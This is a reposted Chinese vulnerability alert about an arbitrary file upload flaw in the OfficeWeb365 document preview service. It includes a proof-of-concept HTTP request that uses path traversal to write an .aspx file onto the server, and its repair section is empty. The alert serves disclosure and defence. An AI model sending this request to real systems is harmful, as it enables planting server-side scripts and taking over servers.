-
暂无
-
高危
OfficeWeb365是专注于Office文档在线预览及PDF文档在线预览云服务,包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览,WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。
- OfficeWeb365
0x05 POC
POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4Accept-Encoding: gzip, deflatedata:image/png;base64,01s34567890123456789y12345678901234567m91<% @ Page Language="C #"%><% @ Import namespace="System. Reflection"%>test>---
0x06 修复建议
原文始发于微信公众号(浅安安全):漏洞预警 | OfficeWeb365任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论